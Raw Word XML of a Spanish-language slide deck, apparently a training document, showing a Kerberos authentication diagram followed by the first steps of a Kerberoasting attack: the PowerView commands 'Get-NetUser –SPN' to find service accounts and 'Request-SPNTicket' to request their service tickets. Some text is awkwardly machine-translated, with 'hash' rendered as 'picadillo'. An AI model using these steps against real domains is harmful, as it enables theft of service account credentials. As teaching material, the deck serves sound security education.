                          <w:p w14:paraId="74F31102" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                              <w:ind w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2BE05FEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="291" w:lineRule="exact"/>
                              <w:ind w:left="3" w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>se realiza el DC.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="04423A2D" id="Textbox 517" o:spid="_x0000_s1267" type="#_x0000_t202" style="position:absolute;margin-left:623.4pt;margin-top:101.7pt;width:228.6pt;height:36.25pt;z-index:-1562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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="74F31102" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                        <w:ind w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2BE05FEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="291" w:lineRule="exact"/>
                        <w:ind w:left="3" w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>se realiza el DC.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487695360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="549DC0CD" wp14:editId="42FA5828">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5515355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1766951</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1478280" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="EC7C30"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="283976AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="177" w:firstLine="124"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>6. TGS es enc con el servicio de destino NTLM</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F8AD6E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="923"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>picadillo</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="549DC0CD" id="Textbox 518" o:spid="_x0000_s1268" type="#_x0000_t202" style="position:absolute;margin-left:434.3pt;margin-top:139.15pt;width:116.4pt;height:50.9pt;z-index:-15621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" fillcolor="#ec7c30" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="283976AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="177" w:firstLine="124"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>6. TGS es enc con el servicio de destino NTLM</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F8AD6E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="923"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>picadillo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C2E11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="211"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13903FFC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF3590D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AC0B88" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="143"/>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695872" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1914CEA6" wp14:editId="4E488128">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4908803</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>267537</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="00DEEDCF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="405" w:firstLine="148"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0355DAE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="1444"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>acceder al servidor de base de datos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1914CEA6" id="Textbox 519" o:spid="_x0000_s1269" type="#_x0000_t202" style="position:absolute;margin-left:386.5pt;margin-top:21.05pt;width:226.8pt;height:50.9pt;z-index:-1562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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00DEEDCF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="405" w:firstLine="148"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0355DAE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="1444"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>acceder al servidor de base de datos</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="44434902" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64549B14" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCE47CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A54EC7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CBF0D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE2A1E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="229"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2369C6D4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="8042"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15837696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E8FC6FA" wp14:editId="7CD150CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1243583</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-248165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2905125" cy="46228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62280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1CEAD2C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="407" w:right="196" w:hanging="219"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>4. El cliente almacena TGT en la memoria y puede ser resolicitado por el administrador de sesión local</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4E8FC6FA" id="Textbox 520" o:spid="_x0000_s1270" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:97.9pt;margin-top:-19.55pt;width:228.75pt;height:36.4pt;z-index:1583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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1CEAD2C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="407" w:right="196" w:hanging="219"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>4. El cliente almacena TGT en la memoria y puede ser resolicitado por el administrador de sesión local</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD776D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId266"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DB6438" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1069"/>
        </w:tabs>
        <w:spacing w:before="64"/>
        <w:ind w:left="1069"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Encuentre las cuentas de usuario que se utilizan como cuentas de servicio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA08718" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="10"/>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97408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05154BC6" wp14:editId="1D089E1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4524755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112053</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2143125" cy="416559"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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416559"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6C7CD7EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="153"/>
                              <w:ind w:left="162"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Get-NetUser –SPN</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="05154BC6" id="Textbox 522" o:spid="_x0000_s1271" type="#_x0000_t202" style="position:absolute;margin-left:356.3pt;margin-top:8.8pt;width:168.75pt;height:32.8pt;z-index:-1561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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6C7CD7EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="153"/>
                        <w:ind w:left="162"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Get-NetUser –SPN</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B79E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372FCEF5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1176"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1176" w:hanging="467"/>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97920" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EA64DF8" wp14:editId="7D0A0CF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4786884</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>411138</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2209800" cy="452755"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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452755"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="743ABA3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="106"/>
                              <w:ind w:left="225"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Request-SPNTicket</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6EA64DF8" id="Textbox 523" o:spid="_x0000_s1272" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:376.9pt;margin-top:32.35pt;width:174pt;height:35.65pt;z-index:-15618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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="743ABA3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="106"/>
                        <w:ind w:left="225"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Request-SPNTicket</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Solicitamos el ticket de servicio TGS, también conocido como :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40237095" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA2ED54" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
